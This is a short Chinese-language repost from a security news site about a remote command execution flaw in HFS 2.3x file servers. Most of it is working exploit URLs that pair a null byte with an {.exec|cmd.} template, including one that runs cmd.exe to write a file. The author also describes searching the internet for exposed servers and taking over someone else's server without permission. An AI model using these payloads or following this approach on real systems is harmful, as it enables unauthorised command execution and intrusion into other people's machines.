安云网 - AnYun.ORG | 专注于网络信息收集、网络数据分享、网络安全研究、网络各种猎奇八卦。
当前位置: 安云网 > 技术关注 > 神兵利刃 > [转]HFS 2.3x 远程命令执行(抓鸡黑客末日)

[转]HFS 2.3x 远程命令执行(抓鸡黑客末日)

时间:2014-09-14来源:WOOYUN 作者:园长点击:
从某论坛看见的,转载部分: 这个程序在国内用的特别多,特别是那些抓肉鸡的黑阔。 http://localhost:80/?search==%00{.exec|cmd.} http://localhost:80/search=%00{.exec|cmd.} 注:有些版本search前面是没有?的。 测试部分: 百度搜HFS默认就是2.3x版本,

从某论坛看见的,转载部分: 
这个程序在国内用的特别多,特别是那些抓肉鸡的黑阔。 

http://localhost:80/?search==%00{.exec|cmd.}  //安云网咨询系统

http://localhost:80/search=%00{.exec|cmd.} 

注:有些版本search前面是没有?的。 

//内容来自安云网



测试部分: 
百度搜HFS默认就是2.3x版本,执行echo测试成功:  //copyright AnYun.ORG
http://localhost:8080/?search==%00{.exec|cmd.exe%20/c%20echo>c:/1.txt%20123.} 
google hack了一下,发现一个抓鸡黑阔: 
1.jpg  //ANYUN.ORG
.... 
2.jpg  //本文来自安云网
已测试官方最新版,一样存在。 
3.png  //安云网咨询系统

撒旦似乎不少: 
4.png  //ANYUN.ORG
测试某表弟的抓鸡服务器同样XXOO了。。
//copyright AnYun.ORG


//安云网咨询系统

PLS SEE:http://zone.wooyun.org/content/15189 //本文来自安云网

评论搬运中.请稍候…………

//安云网,anyun.org

顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
验证码: 点击我更换图片
相关内容
推荐内容